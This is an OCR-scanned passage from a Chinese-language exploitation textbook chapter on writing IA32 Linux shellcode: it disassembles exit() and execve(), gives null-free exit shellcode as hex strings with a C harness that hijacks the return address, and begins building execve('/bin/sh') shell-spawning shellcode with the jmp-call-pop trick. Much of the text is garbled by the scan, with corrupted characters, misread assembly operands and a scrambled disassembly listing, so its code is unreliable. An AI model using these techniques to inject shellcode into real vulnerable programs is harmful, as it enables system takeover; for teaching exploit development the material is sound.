(4) CPU 切换 到 内 核 模式 。 

(5) 执行 系统 函数 。 

每 个 系统 调用 都 对 应 一 个 整数 。 当 执行 系统 调用 时 ， 必 须 把 这 个 整数 载 入 EAXx。 每 个 系统 调 
用 最 多 支持 6 个 参数 ， 分 别 保存 在 EBX、ECX、EDX、ESI、EDI 利 EBP 里 。 如 果 参 数 超 过 6 个 ， 超 出 
的 这 些 参数 将 通过 第 一 个 参数 指定 的 数据 结构 来 传递 。 

现在 ， 你 应 该 从 汇编 层 了 解 系统 调用 是 怎么 工作 的 了 。 现 在 就 按 这 个 步骤 ， 在 C 里 请 求 系统 
调用 ， 然 后 反 汇 编 编译 后 的 程序 ， 查 看 对 应 的 汇编 指令 是 什么 。 

最 常见 的 系统 调用 应 该 是 exit ()， 它 的 作用 是 终止 当前 的 进程 。 我 们 写 个 简单 的 C 程 序 ， 它 
在 执行 后 立即 退出 ， 代 码 如 下 : 

: () 

exit(0); 
) 
编译 时 gcc 使 用 static 选 项 ， 这 可 以 防止 使 用 动态 链接 ; 动态 链接 将 保留 退出 系统 调用 代 


gcc -static -o exit exit.c 


接着 ， 反 汇编 生成 的 二 进 制 文件 。 

[slap@0day root] gdb exit 

GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) 

Copyright 2003 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and you 
are welcome to change it and/or distribute copies of it under certain 
conditions. Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "i386-redhat-linux-gnu'... 

(gdb) disas | exit 

Dump of assembler code for function exit: 
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0x0804d9bc <_exit+0>: mov Ox4(Sesp,1),$ebx 


0x0804d9c0 <_exit+4>: mov SOxfc, Seax 
Ox0804d9c5 « exit+9>: int $0x80 
0x0804d9c7 « exit*«11»: mov $0x1, eax 
Ox0804d9cc <_exit+16>: int $0x80 


Ox0804dS9ce <_exit+18>: hilt 
Ox0804d9cf « exit-19»: nop 
End of assembler dump. 


如 果 在 反 汇 编 生 成 的 代码 里 寻找 exit， 可 以 找到 两 个 系统 调用 。 在 exit+4 和 exit+11 行 ， 
可 以 看 到 对 应 的 系统 调用 编号 分 别 被 复制 到 EAX。 


0x0804d9c0 « exit+4>: mov SOxfc, eax 
0x0804d9c7 <_exit+11>: mov $Ox1, eax 


exit group () 对 应 的 系统 调用 编号 是 232，exit () 对 应 的 系统 调用 编号 是 1。 在 反 汇 编 生 成 
的 代码 里 还 有 一 条 指令 ， 它 把 退出 系统 调用 的 参数 加 载 到 EBX。 这 个 参数 为 0， 是 在 系统 调用 之 前 
压 入 栈 的 。 

Ox0804d9bc <_exit+0>: mov 0x4 (%esp,1),%ebx 

最 后 是 两 条 int 0x80 指 令 ， 这 两 条 指令 把 CPU 切换 到 内 核 模 式 ， 并 执行 系统 调用 。 


Ox0804d9c5 <_exit+9>: int $0x80 
Ox0804d9cc <_exit+16>: int $0x80 


这 就 是 exit () 系统 调用 对 应 的 汇编 指令 。 
3.2 为 exit() 系 统 调用 写 shellcode 


基本 上 , 我 们 已 经 为 编写 exit () shellcode 收 集 了 必要 的 素材 。 我 们 已 经 用 C 语 言 编写 了 一 个 
执行 系统 调用 的 程序 ， 编 译 然后 反 汇编 了 生成 的 二 进 制 文件 ， 并 和 弄 懂 了 那些 汇编 指令 的 合 义 。 最 
后 要 做 的 就 是 整理 shellcode， 从 汇编 指令 得 到 十 六 进 制 的 操作 码 ， 测 试 生 成 的 shellcode， 看 它 是 
否 可 以 正常 工作 。 现 在 就 开始 学 习 怎 样 优化 、 整 理 shellcode 吧 。 


shellcode 的 大 小 


因为 较 小 的 shelleode 可 以 注入 更 多 的 缓冲 区 ; 可 以 用 来 攻击 更 多 的 程序 ， 所 以 要 使 
shellcodeR ERR R, RR. it, 当 攻 击 问题 程序 时 ,需要 把 shelleode 复 制 到 缓冲 区 ， 如 
果 碰 到 hn 字 节 长 的 缓冲 区 ， 不 仅 要 把 整个 shellcode 复 制 到 它 里 面 ， 而 且 还 要 加 上 调用 shellcode 
的 指令 ， 因此，shellcode 的 长 度 必 须 比 2 小 。 基于 这 个 原因 ， 在 号 shelleode 的 时 候 ; MHA 
意 它 的 大 小 。 | 


我 们 的 shellcode 现 在 有 7 条 指令 , 但 shellcode 应 该 尽量 紧凑 ,这样 才 能 注入 更 小 的 缓冲 区 ， 因 
此 ， 要 对 这 7 条 指令 进行 优化 和 整理 。 在 实际 环境 中 ，shellcode 将 在 没有 其 他 指令 为 它 设 置 参数 
的 情况 下 执行 〈 在 这 个 例子 里 ， 其 他 的 指令 从 栈 上 得 到 参数 ， 然 后 放 入 EBX)， 因 此 ， 必 须 自 己 设 
置 参数 ， 在 这 个 例子 里 ， 通 过 把 0 放 入 EBX 可 以 达到 设置 参数 的 目的 。 另 外 ， 我 们 的 shellcode 只 需 
要 exit() 系 统 调用 ， 因 此 可 以 忽略 group_exit () ， 这 不 会 影响 最 终结 果 。 从 shellcode 的 执行 效 
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率 考 虑 ， 这 里 也 不 必 使 用 group_exit () 。 

从 高 层 来 看 ， 我 们 的 shellcode 应 该 完成 以 下 任务 。 

(1) 把 0o 存 到 EBX。 

(2) 把 1 存 到 EAX。 

(3) 执行 int 0x80 指 令 来 产生 系统 调用 。 

先 用 汇编 指令 实现 这 3 个 步骤 ， 得 到 ELF 格 式 的 二 进 制 文件 ， 最 后 从 这 个 二 进 制 文件 里 提取 
操作 码 。 


Section .text 
global start 
.Start: 


mov ebx,0 
mov eax,1 
int 0x80 


先 用 nasm 编 译 器 生成 目标 文件 ， 然 后 用 GNU 链 接 器 链接 目标 文件 : 


[slap@0day root] nasm -f elf exit shellcode.asm 
[slap80day root] ld -o exit shellcode exit shellcode.o 


一 切 就 绪 ， 可 以 从 生成 的 文件 里 提取 操作 码 了 。 在 这 里 ， 我 们 用 objdump 来 帮忙 。objdump 
是 一 个 简单 实用 的 工具 ， 以 可 读 的 格式 显示 目标 文件 的 内 容 。 在 显示 目标 文件 内 容 的 同时 ， 它 也 
会 显示 相应 的 操作 码 ， 这 个 功能 在 编写 shellcode 的 时 候 非 常 有 帮助 。 像 下 面 这 样 用 objdump 运 行 
exit_shellcode 程 序 : 

[slap@0day root] objdump -d exit_shellcode 

exit_shellcode: file format elf32-1386 


Disassembly of section .text: 


08048080 <.text>: 


8048080: bb 00 00 00 00 mov $0x0, $ebx 
8048085: b8 01 00 00 00 mov $0x1, eax 
804808a: cd 80 int $0x80 


可 以 看 到 右边 是 汇编 指令 ,左边 是 操作 码 。 在 这 个 例子 里 ， 我 们 需要 把 这 些 操作 码 放 到 字符 
串 数 组 里 ， 然 后 写 个 C 程 序 来 执行 这 个 字符 串 。 下 面 是 相应 的 例子 〈 如 果 你 不 想 输入 ， 可 以 在 本 
书 配套 网 站 上 找到 现成 的 源 代码 )。 

char shellcode[] = "\xbb\x00\x00\x00\x00" 


"\xb8\x01\x00\x00\x00" 
"\xcd\x80"; 


int main() 


{ 
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int *ret; 
ret = (int *)&ret + 2; 
(*ret) = (int)shellcode; 


} 


现在 ， 编 译 这 个 程序 来 测试 shellcode。 


[slap@0day slap] gcc -o wack wack.c 
[slap@O0day slap] ./wack 
[slap@0day slap] 


进程 看 起 来 好 像 是 正常 退出 了 , 但 是 怎么 确认 它 确 实 执行 了 shellcode 呢 ? 可 以 请 系统 调用 追 
踪 器 (strace) 来 帮忙 ， 它 可 以 显示 程序 里 的 每 一 个 系统 调用 。 下 面 是 strace 的 输出 : 


[slap@0day slap] strace ./wack 

execve("./wack", ["./wack"], [/* 34 vars */]) = 0 uname ({(sys="Linux", 
node="0day.jackkoziol.com", ...}) = 0 

brk(0) = 0x80494d8 

old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, ~1, 0) = 0x40016000 


open("/etc/ld.so.preload", O RDONLY) = -1 ENOENT (No such file or directory) 
open("/etc/ld.so.cache", O RDONLY) -3 

fstat64(3, (st mode-S IFREG|0644, st size-78416, ...)) = 0 

old mmap(NULL, 78416, PROT READ, MAP PRIVATE, 3, 0) - 0x40017000 

close (3) -0 

open("/lib/tls/libc.so.6", O RDONLY) = 3 

read(3, "AL77ELENINININONONONONONONONONON3NON3NON1NONONO VA1BAXNO" ..., 512) = 512 
fstat64(3, (st mode-S IFREG|0755, St size-1531064, ...}) = 0 


old mmap(0x42000000, 1257224, PROT READ|PROT EXEC, MAP PRIVATE, 3, 0) = 0x42000000 
old mmap(0x4212e000, 12288, PROT READ|PROT WRITE, 

MAP PRIVATE|MAP FIXED, 3, 0x12e000) = 0x4212e000 

old mmap(0x42131000, 7944, PROT READ|[PROT WRITE, 

MAP PRIVATE|MAP FIXED|MAP ANONYMOUS, -1, 0) - 0x42131000 

close(3) = 0 

set_thread_area({entry_number:-1 -> 6, base_addr:0x400169e0, 

limit:1048575, seg 32bit:1, contents:0, read exec only:0, 


limit, in pages:1, seg not present:0, useable:1)) = 0 
munmap(0x40017000, 78416) = 0 
exit (0) =? 


可 见 ， 最 后 一 行 是 exit () 系统 调用 。 如 果 你 不 想 使 用 exit () ， 可 以 修改 shellcode， 让 它 执 


行 exit_group()。 


char shellcode[] = "\xbb\x00\x00\x00\x00" 
"\xb8\xfc\x00\x00\x00" 
"\xcd\x80"; 
int main() 
{ 
int *ret; 


ret = (int *)&ret + 2; 
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(*ret) = (int)shellcode; 
} 


修改 后 的 exit_group (jshellcode 具 有 同样 的 功能 。 注 意 ， 我 们 仅仅 改变 了 第 二 行 的 第 一 个 
操作 码 (把 \xol(1) 改 成 \xfc(252)， 也 就 是 说 只 改动 了 相应 的 系统 调用 值 )。 重 新 编译 后 再 次 运 
行 strace， 就 可 以 看 到 修改 后 的 系统 调用 。 


[slap@0day slap] strace ./wack 

execve("./wack", ["./wack"], [/* 34 vars */]) = 0 

uname ({sys="Linux", node-"0day.jackkoziol.com", ...)) = 0 

brk(0) = 0x80494d8 

old mmap(NULL, 4096, PROT READ|PROT WRITE, MAP PRIVATE|MAP ANONYMOUS, -1, 0)= 0x40016000 


open("/etc/ld.so.preload", O RDONLY) = -1 ENOENT (No such file or directory) 
open("/etc/ld.so.cache", O RDONLY) = 3 

fstat64(3, (st mode-S IFREG|0644, st size-78416, ...)) = 0 

old mmap(NULL, 78416, PROT READ, MAP PRIVATE, 3, 0) = 0x40017000 

close(3) = 0 

open("/lib/tls/libc.so.6", O_RDONLY) = 3 

read(3, "VX177ELFNININ1N0N0ONOXONONOXONONON3NOXN3NON1NONONO VALBANO"..., 512) = 512 
fstat64(3, {st_mode=S_IFREG|0755, st_size=1531064, ...}) = 0 


old mmap(0x42000000, 1257224, PROT READ|PROT EXEC, MAP PRIVATE, 3, 0) = 0x42000000 
old mmap(0x4212e000, 12288, PROT READ|PROT WRITE, 


MAP PRIVATE|MAP FIXED, 3, 0x12e000) = 0x4212e000 

old mmap(0x42131000, 7944, PROT READ|PROT WRITE, 

MAP PRIVATE|MAP FIXED|MAP ANONYMOUS, -1, 0) - 0x42131000 
close(3) = 0 


set_thread_area({entry_number:-1 -> 6, base addr:0x40016960, 
limit:1048575, seg 32bit:1, contents:0, read exec only:0, limit in pages:1, 
seg not, present:0, useable:1}) = 0 


munmap (0x40017000, 78416) = 0 


exit group(0) = ? 


至 此 ， 我 们 完成 了 最 简单 、 可 运行 的 shellcode， 但 是 ， 这 个 shellcode 在 实际 利用 环境 中 可 能 
无 法 使 用 。 为 什么 会 这 样 呢 ? 下 一 节 将 说 明 这 个 问题 ， 并 讨论 怎样 解决 它 ， 以 便 编 写 出 真正 可 用 
的 shellcode。 


3.3 可 注入 的 shellcode 


当 攻 击 时 ， 最 有 可 能 用 来 保存 shellcode 的 内 存 区 域 是 为 了 保存 用 户 的 输入 而 分 配 的 缓 神 区 ， 
其 至 可 以 进一步 讲 ， 这 个 缓冲 区 就 是 字符 数组 。 但 是 ， 如 果 仔 细 看 刚才 编写 的 shellcode: 

\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80 
你 会 发 现 这 个 shellcode 中 有 许多 空 值 (\x00)。 因 为 这 些 空 值 的 存在 ， 当 把 shellcode 复 制 到 
缓冲 区 《〈 字 符 数组 ) 的 时 候 会 出 现 异 常 〈 因 为 在 字符 数组 里 ， 空 值 是 用 来 终止 字符 串 的 )。 为 
了 解决 这 个 问题 ， 我 们 需要 找 出 把 空 值 转换 成 非 空 操作 码 的 方法 。 当 然 ， 前 人 经 过 不 断 的 实 
践 ， 发 现 有 两 个 方法 可 以 比较 好 地 解决 这 个 问题 。 第 一 个 方法 比较 简单 ， 直 接 用 其 他 具有 相 
同 功 能 的 指令 替换 那些 产生 空 值 的 指令 。 第 二 个 方法 稍微 复杂 一 些 ， 它 涉及 在 运行 时 用 不 生 
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成 空 值 的 指令 加 上 空 值 。 第 二 个 方法 实现 起 来 比较 麻烦 ， 因 为 必须 知道 shellcode 在 内 存 中 的 
精确 地 址 ， 而 找到 这 个 地 址 还 需要 另外 的 技巧 ， 因 此 我 们 把 第 二 个 方法 留 到 更 高 级 的 例子 里 
讨论 。 


先 来 试验 第 一 个 方法 。shellcode 使 用 如 下 的 3 条 汇编 指令 和 对 应 的 操作 码 : 


mov ebx,0 \xbb\x00\x00\x00\x00 
mov eax,1 \xb8\x01\x00\x00\x00 
int 0x80 \xcd\x80 


KARE RP AER . 如果 你 熟悉 汇编 语言 ， 应 该 知道 Exclusive OR (xor) 指 
令 在 两 个 操作 数 相等 的 情况 下 返回 9。 这 意味 着 如 果 Exclusive OR (xor) 的 两 个 操作 数 相等 ， 那 
么 在 指令 里 可 以 不 使 用 0, 但 结果 为 0， 所 以 得 到 非 空 值 操 作 码 。 具体 做 法 是 用 Exclusive OR (xor) 
指令 代替 mov 指 令 ， 把 EBX 设 置 为 0。 因 此 ， 第 一 条 指令 

mov ebx,0 
变 成 

xor ebx, ebx 
这 就 消灭 了 一 条 含有 空 值 的 指令 ， 过 一 会 再 测试 。 . 

你 可 能 会 奇怪 ， 为 什么 第 二 条 指令 中 也 有 空 值 呢 ?我 们 并 没有 把 0 放 进 寄存 器 呀 ， 为 什么 产 
生 的 操作 码 会 有 空 值 ? 记 住 ， 这 条 指令 使 用 了 32 位 (4B) 寄存 器 EAX， 而 我 们 只 复制 了 1B 到 寄 
存 器 ， 因 此 ， 在 默认 的 情况 下 ， 系 统 用 空 值 填充 剩 下 的 部 分 。 

如 果 熟 悉 EAX 的 组 成 ， 就 能 成 功 地 规避 这 个 问题 。 Eax 可 以 拆 分 成 两 个 16 位 的 “区 域 ” 用 
AX 可 以 访问 第 一 个 16 位 区 域 ， 而 AX 又 可 以 进一步 分 成 AL 和 AH 两 部 分 ， 如 果 只 使 用 第 一 个 8 位 ， 
就 可 以 直接 使 用 AL。 在 这 个 例子 里 ， 二 进 制 1 占 用 8 位 ， 因 此 ， 只 需 把 1 复制 到 AL 就 可 以 达到 目 
的 ， 从 而 避免 在 使 用 EAX 时 ， 系 统 用 空 值 填充 寄存 器 的 其 余部 分 。 为 了 达到 这 个 目的 ， 改变 最 初 
的 指令 


mov eax,1 








FAaAL{RPEAX: 
mov al,1 

至 此 ， 我 们 应 该 把 shellcode 中 的 空 值 都 消灭 了 。 检 验 一 下 : 
Section .text 


global start 
start: . 
xor ebx, ebx 


mov al,1 
int 0x80 


把 所 有 代码 放 在 一 起 后 ， 用 objaump 反 汇编 。 
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[slap@Oday root] nasm -f elf exit shellcode.asm 
[slapG0day root] ld -o exit shellcode exit. shellcode. o 
[slap@0day root] objdump -d exit shellcode 





exit shellcode: file format elf32-i1386 
友 汇 编 .text 段 ， 

. 08048080 «.text»: 
8048080: 31 db xor Sebx, tebx 
8048085: bo 01 mov $0x1,%al 
804808a: ca 80 int $0x80 


可 以 看 到 shellcode 中 的 NULL opcode 确 实 消失 了 ， 而 且 长 度 也 减 小 了 。 现 在 ， 你 拥有 一 个 可 
以 正常 工作 的 、 可 注入 的 shellcode 了 。 


3.4 派生 shell 


编写 exit () shellcode 实 际 上 只 是 简单 的 练习 ， 因 为 exit () shellcode 在 实际 环境 中 没什么 用 
处 ， 如 果 想 让 有 漏洞 的 缓冲 区 进程 退出 ， 只 要 用 非法 指令 填充 缓冲 区 即 可 ， 大 可 不 必 劳 力 伤神 地 
用 什么 exit () shelicode。 当 然 ， 这 并 不 意味 着 你 前 面 所 有 的 艰辛 劳动 都 付 之 东 流 了 ， 在 某 些 破 
解 过 程 中 , 可 以 先 用 其 他 的 shellecode 完 成 某 些 目的 , 然后 用 exit () shellcode 强 制 进程 干净 地 关闭 ， 
而 干净 地 关闭 进程 在 某 些 特殊 情况 下 是 非常 有 用 的 。 

我 们 不 再 满足 于 “关闭 进程 ” 而 是 要 做 一 些 更 有 趣 的 事情 控制 整个 目标 
系统 。 和 前 面 的 步 对 似 ， 我 人 从容 开 给 介绍 在 样 在 IA32 Linux 操作 系统 上 写 dbeliode 计划 用 5 
个 步骤 来 实现 。 

(1) 先 用 高 级 语言 编写 shellcode 程 序 。 

(2) 编译 并 反 汇 编 这 个 shellcode 程 序 。 

(3) 从 汇编 级 分 析 程 序 执 行 流程 。 

(4) 整理 生成 的 汇编 代码 ， 尽 量 减 小 它 的 体积 并 使 它 可 注入 。 

(5) 提取 opcode， 创 建 shellcode。 

首先 编写 派生 shell 的 C 程 序 。 派 生 shell 最 方便 、 最 快捷 的 方法 是 创建 新 进程 。 在 Linux 里 ， 有 
两 种 方法 创建 新 进程 : 一 是 通过 现 有 的 进程 创建 它 ， 并 用 它 替 换 正 在 活动 的 进程 ; 二 是 利用 现 有 
的 进程 生成 它 自己 的 副本 ,并 在 它 的 位 置 运行 这 个 新 进程 。 不 过 不 必 过 于 操心 ,只 需 通 过 fork () 
和 execve () 系 统 调用 告诉 内 核 我 们 想 做 什么 就 可 以 了 , 内 核 将 会 打 理 好 一 切 。 fork () 和 execve() 
一 起 创建 现 有 进程 的 副本 ， 但 execve () 要 特殊 一 些 ， 它 可 以 在 现 有 的 进程 空间 里 单独 执行 其 他 
的 进程 。 

为 了 使 程序 尽量 简单 ， 在 这 里 使 用 execve。 下 面 是 一 个 简单 C 程 序 的 execve 调 用 。 


#include <stdio.h> 





int main() 
{ 
char *happy[2]; 


40 $3 


A 


* 


shellcode 





happy[0] 
happy [1] 
execve 


} 


"/pin/sh"; 


NULL; 


(happy[0], happy, 


NULL); 


编译 并 执行 这 个 程序 ， 看 它 是 否 符 合 我 们 的 要 求 。 
[Slap@Qday root]# gcc spawnshell.c -o spawnshell 


[slap@Oday root] # 
sh-2.05b# 


可 见 ， 程 序 派生 了 shell。 虽 然 它 现在 看 起 来 没什么 意思 ， 但 是 如 果 把 这 段 代 码 注入 到 远程 进 
程 里 ， 并 利用 漏洞 使 远程 进程 执行 它 ， 你 就 能 见识 到 它 的 威力 了 。 现在， 为 了 使 它 可 以 在 脆弱 的 
必须 把 它 转 换 成 原始 十 六 进 制 指令 。 因 为 此 前 我 们 已 经 做 过 类 似 的 练习 ， 并 


缓冲 区 里 正常 运行 ， 


积累 了 一 些 的 经 验 ， 所 以 现在 做 起 来 就 轻车熟路 了 。 首 先 用 gcc 的 -static 选 项 重新 编译 这 个 


./spawnshell 


shellcode〈 防 止 编译 时 用 动态 链接 )。 


gcc -static -o spawnshell spawnshell.c 


接 下 来 反 汇 编 编 译 好 的 二 进 制 文件 ， 从 中 提取 操作 码 。 为 了 节省 空间 ， 我 们 对 objdump 的 输 


出 做 了 适当 的 修改 ， 只 显示 相关 的 部 分 。 


080481d0 <main>: 


80481d0: 
80481d1: 
80481d3: 
80481d6: 
80481d9: 
80481de: 
8048160: 
80481e7: 
80481ee: 
80481f1: 
80481f3: 
80481f6: 
80481f7: 
80481fa: 
80481ff: 
8048202: 
8048203: 


0804d9f0 
804g9f0: 
804d9f1: 
804d9f6: 
804d9f8: 
804d9fa: 
804d9fb: 
804d9fc: 
804g9ff: 


55 
89 
83 
83 
b8 
29 
c7 
c7 
83 
6a 
8d 
50 
ff 
e8 
83 
c9 
c3 


e5 
ec 
e4 
00 
c4 
45 
45 
ec 
00 
45 


75 
£1 
c4 


08 
£0 
00 


£8 
fc 
04 


f8 


£8 


57 
10 


00 


88 
00 


00 


< execve»: 


55 
b8 
89 
85 
57 
53 
8b 
74 


00 00 00 


e5 
cO 


"7d 08 


05 


00 


ef 08 08 
00 00 00 


00 


00 


push 
mov 
sub 
and 
mov 
sub 
movil 
movil 
sub 
push 
lea 
push 
pushl 
call 
add 
leave 
ret 


push 
mov 
mov 
test 
push 
push 
mov 
je 


Sebp 

gesp, Sebp 

$0x8,%esp 
SOxffLfFLLLfO, esp 
$0x0, teax 

%eax, esp 

$Ox808ef88, OxffFFFFF8 (%ebp) 
SOxO0,0xfffffffc(&ebp) 
$0x4,%esp 

$0x0 
Oxfffffff8(Sebp),teax 
Seax 

Oxfffffff8(tebp) 
804d9f0 <  execve» 
$0x10, %esp 


$ebp 

$0x0, $eax 

sesp, tebp 

Seax, eax 

sedi 

sebx 

0x8 (%ebp) , sedi 

804da06 <__execvet0x16> 
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804da01: e8 fa 25 fb f7 call 0 « init-0x80480b4» 
804da06: 8b 4d Oc mov Oxc (%ebp) , eck 

804da09: 8b 55 10 mov 0x10 (%ebp) , edx 
804da0c: 53 push $ebx 

804da0d: 89 fb mov sedi, tebx 

804da0f: b8 Ob 00 00 00 mov $Oxb, $eax 

804dal4: cd 80 int $0x80 

804dal6: 5b pop %ebx 

804dal7: 3d 00 fO ff ff emp SOxfffFf000, teax 
804dalc: 89 c3 mov %eax, tebx 

804dale: 77 06 ja 804da26 <__execve+0x36> 
804da20: 89 d8 mov Sebx,S$eax 

804da22: 5b pop Sebx 

804da23: 5f pop Sedi 

804da24: c9 leave 

804da25: c3 ret 

804da26: £7 db neg $ebx 

804da28: e8 cf ab ff ff call 80485fc « errno location» 
804da2d: 89 18 mov . %ebx, (Seax) 

804da2f: bb ff ff ff ff mov SOxffffffff,Stebx 
804da34: eb ea jmp 804da20 <__execvet0x30> 
804da36: 90 nop 

804da37: 90 nop 


从 上 面 可 以 看 出 ，execve 系 统 调 用 在 译 成 shellcode 后 ， 有 相当 一 部 分 指令 有 问题 〈 操 作 码 中 
存在 空 值 )， 移 走 这 些 空 值 并 压缩 shellcode 需 要 花 一 些 时 间 。 因 此 ， 我 们 决定 先 看 一 下 execve 系 
统 调 用 的 相关 信息 ， 然 后 再 决定 接 下 来 的 行动 。execve 的 man 手 册 是 非常 好 的 起 点 ， 它 的 头 两 段 
提供 的 信息 很 有 价值 。 


int execve(const char *filename, char *const argv[], char *const envp[]); 


O execve() 执 行 filename (指针 ) 指向 的 程序 。filename 必 须 是 以 下 两 种 文件 中 的 一 种 : 
可 执行 的 二 进 制 文件 ， 或 者 首 行 以 “#1! interpreter [arg] ”开始 的 脚本 文件 。 如 果 是 
后 一 种 , interpreter 必 须 是 可 执行 解释 器 的 有 效 路 径 名 , 而 不 是 脚本 文件 本 身 , execve () 
将 用 interpreter [arg] filename 的 形式 调用 它们 。 
O argv 是 字符 串 数 组 ， 用 来 传递 参数 ，envp 也 是 字符 串 数组 ， 按 照 惯例 来 自 key=value， 用 
来 传递 环境 变量 。argv 和 envp 都 以 空 值 指针 结束 。 
阅读 execve 的 man 手 册 可 知 ， 只 和 需 3 个 参数 就 可 以 调用 execve 了 。 在 exit () 系统 调用 的 例子 . 
里 我 们 学 过 怎样 为 Linux 系 统 调用 传递 参数 (把 它们 中 的 6 个 载 入 寄存 器 )。execve () 的 man 手 册 
指出 这 3 个 参数 必须 是 指针 ， 第 一 个 参数 是 指向 将 被 执行 程序 的 字符 串 的 指针 ; 第 二 个 参数 是 指 
向 参数 数组 的 指针 ， 在 这 里 是 将 要 执行 的 程序 名 〈/bin/sh); 第 三 个 参数 是 指向 环境 变量 数组 
的 指针 ， 在 这 里 为 空 值 ， 因 为 在 这 个 例子 里 不 必 传 递 这 些 数据 。 


注解 因 A EAR HORAE E Heda 给 字符 符 囊 ， 所 以 要 牢记 空 AAI Ae TAB. 
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执行 execve 0 系统 调用 需要 使 用 4 个 寄存 器 : 1 个 寄存 器 用 于 保存 execve 的 系统 调用 值 〈 十 
进 制 11 或 十 六 进 制 0xob)， 其 他 3 个 寄存 器 用 于 保存 系统 调用 参数 。 一 旦 以 合法 的 格式 正确 设置 
了 这 些 参数 ， 就 可 以 切换 到 内 核 模 式 来 执行 系统 调用 了 。 根 据 man 手 册 的 描述 ， 应 该 可 以 比较 好 
地 理解 反 汇编 输出 的 内 容 。 

Amain) 的 第 7 条 指令 开始 ， 字 符 串 /bin/sh 的 地 址 被 复制 到 内 存 里 ， 稍 后 把 它 作 为 execve 
系统 调用 的 参数 复制 到 寄存 器 ;: 

80481e0: movl $0x808ef88,0xfffffff8(Sebp) 

接 下 来 ， 程 序 把 空 值 复 制 到 邻近 的 内 存 空间 里 ， 稍 后 把 它 复制 到 寄存 器 ， 并 在 系统 调用 时 
使 用 : 

80481e7: movl SOx0,0xfffffffc(S*ebp) 

现在 该 压 入 参数 了 ， 以 便 在 调用 execve 后 使 用 。 第 一 个 压 入 的 参数 是 空 值 ; 

80481f1: push  $0x0 

接 下 来 压 入 的 是 参数 数组 的 地 址 (happy[]1)。 程 序 先 把 这 个 地 址 复制 到 Eax， 然 后 将 ERx 中 
的 地 址 值 压 入 栈 : 


80481f3: lea Oxfffffff8(Sebp),$eax 
80481f6: push %eax 


最 后 把 /bin/sh 字 符 串 的 地 址 压 入 栈 : 

80481f7: pushl Oxfffffff8(&ebp) 

WH execveRi A 

. 80481fa: call 804d9£f0 <execve> 

execve 函 数 的 作用 是 设置 相关 的 寄存 器 ， 然 后 执行 中 断 。 因 为 编译 器 对 代码 进行 了 优化 ， 
所 以 当 从 底层 查看 时 , 会 发 现 C 函 数 译 成 的 汇编 指令 有 些 令 人 费解 。 因此 只 把 重要 的 挑 出 来 介绍 ， 
把 其 他 的 丢 到 一 边 。 . : 

第 一 条 重要 的 指令 把 /bin/sh 字 符 串 的 地 址 载 入 EBX: 


804d9fc: mov 0x8 (%ebp) , edi 
804da0d: mov %edi, %ebx 


接 下 来 ， 把 参数 数组 的 地 址 载 入 ECX: 


804da06: mov Oxc (%ebp) , ecx 


然后 把 空 值 的 地 址 载 入 EDXx: 


804da09: mov 0x10 (%ebp) , tedx 


把 execve 对 应 的 系统 调用 编号 11 复 制 到 最 后 一 个 寄存 器 EAX: 


804da0f: mov $Oxb, teax 
ESI Bde. Bint 0x80 指 令 ， 切 换 到 内 核 模 式 ， 执 行 系统 调用 : 
804dal4: int $0x80 


通过 上 面 的 描述 ， 现 在 你 应 该 从 汇编 角度 理解 execve 系 统 调 用 背后 的 理论 知识 了 ， 并 且 我 
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们 已 经 反 汇 编 了 一 个 C 程 序 ， 可 以 利用 这 些 来 创建 shellcode 了 。 从 exit shellcode 的 例子 了 解 到 ， 
要 使 操作 码 可 用 ， 还 需要 解决 几 个 问题 。 


看 ! 讨厌 的 空 值 又 出 现 了 。 设 置 EAx 和 EDX 的 指令 里 有 空 值 ，/bin/sh 字 符 串 的 终止 符 也 是 空 
值 。 可 以 用 exit () shellcode 例 子 里 介绍 过 的 技巧 来 消灭 这 些 空 值 。 其 实 ， 这 部 分 相 比较 而 言 算 
是 简单 的 ， 接 下 来 还 要 更 难 一 些 。 

我 们 曾 提 到 过 ， 在 shellcode 里 不 可 以 使 用 硬 编码 地 址 。 硬 编码 地 址 将 减少 shellcode 在 不 同 
Linux 版 本 及 不 同 问题 程序 之 间 的 通用 性 。 我 们 希望 shellcode 容 易 移植 , 而 不 是 在 每 次 使 用 时 都 重 
新 编写 。 因 此 ， 我 们 使 用 相对 地 址 。 相 对 地 址 有 多 种 实现 方法 ， 在 这 里 介绍 的 是 最 流行 、 最 经 典 
的 方法 。 

在 shellcode 里 使 用 相对 地 址 需要 一 些 技巧 。 我 们 可 以 把 shellcode 在 内 存 中 的 开始 地 址 或 
shellcode 的 重要 元 素 复 制 到 寄存 器 里 ， 然 后 根据 寄存 器 里 的 地 址 ， 精 心 构造 每 条 指令 。 

实现 这 个 方法 有 一 个 非常 经 典 的 技巧 ， 就 是 shellcode 以 一 条 跳 转 指令 开始 ， 跳 转 指令 跳 过 
shellcode 后 转 到 调用 指令 ， 直 接 跳 到 调用 指令 可 以 设置 相对 寻 址 。 执 行 调用 指令 时 ， 紧 跟 在 调用 
指令 之 后 的 指令 的 地 址 将 被 压 入 栈 。 这 个 技巧 有 一 个 关键 之 处 ， 就 是 你 必须 把 想 作 为 相对 地 址 的 
基地 址 直接 放 在 调用 指令 之 后 。 那 么 ， 当 调用 指令 被 执行 后 ， 我 们 的 基地 址 将 自动 保存 在 栈 上 ， 
而 我 们 不 必 提 前 知道 这 个 地 址 是 什么 。 

我 们 最 终 还 是 要 执行 shellcode， 因 此 ， 在 跳 转 之 后 ， 调 用 指令 将 立即 调用 shellcode， 而 这 将 
把 执行 控制 交 给 shellcode。 最 后 的 修改 效果 是 使 紧 跟 在 跳 转 之 后 的 第 一 条 指令 是 PoP ESI， 这 条 
指令 将 从 栈 上 弹出 基 址 并 把 它 放 入 EsT。 至 此 , 就 可 以 根据 EsI 的 距离 (或 偏 移 量 ) 来 引用 shellcode 
里 的 代码 。 让 我 们 通过 一 段 伪 代码 说 明 整 个 过 程 。 


jmp short GotoCall 
shellcode: 
pop esi 


<shellcode meat> 


GotoCall: 
Call shellcode 
Db '/bin/sh' 


从 技术 上 来 说 ，DB (define byte) 并 不 是 一 条 指令 ， 它 只 在 内 存 里 为 字符 串 设 置 存 贮 空间 。 
下 面 简单 介绍 一 下 这 段 代 码 的 作用 。 
(1) 第 一 条 指令 跳 到 Gotocall，Gotocall 立 即 执行 CALL 指 令 。 
